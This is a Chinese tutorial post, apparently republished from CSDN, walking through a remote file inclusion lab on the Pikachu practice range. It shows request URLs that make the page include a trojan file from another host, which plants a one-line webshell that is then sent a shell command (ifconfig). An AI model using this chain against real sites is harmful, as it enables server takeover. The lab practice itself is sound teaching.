标签:文件 cn 包含 yijuhua E6% 漏洞 php 远程
什么是远程文件包含漏洞:
攻击者可以通过访问外部地址来加载远程代码。
实验环境:
皮卡丘靶场—File Inclusion(remote)
(tips: 如果使用include和require,需在php.ini文件配置如下:allow_url_fopen = on //默认打开
allow_url_include = on //默认关闭)
实验步骤:
-
正常提交请求:
此时的url提交的内容为当前目标文件路径:
http://localhost/pikaqiu.cn/vul/fileinclude/fi_remote.php?filename=include%2Ffile1.php&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2 -
可以将路径改为远程服务器的路径(192.168.1.8/pikachu.cn/muma.txt),让其读取远程文件:
http://localhost/pikaqiu.cn/vul/fileinclude/fi_remote.php?filename=192.168.1.8/pikachu.cn/muma.txt&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2
木马内容:
-
提交连接以后,后端就多出一个yijuhua.php文件,并且有传入的内容:
-
新增的yijuhua.php和当前目录在同一级,因此可以直接访问新建的yijuhua.php,并且以GET请求的方式传入参数
http://localhost/pikaqiu.cn/vul/fileinclude/yijuhua.php?x=ifconfig
标签:文件,cn,包含,yijuhua,E6%,漏洞,php,远程 来源: https://blog.csdn.net/Ethan024/article/details/115531574
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。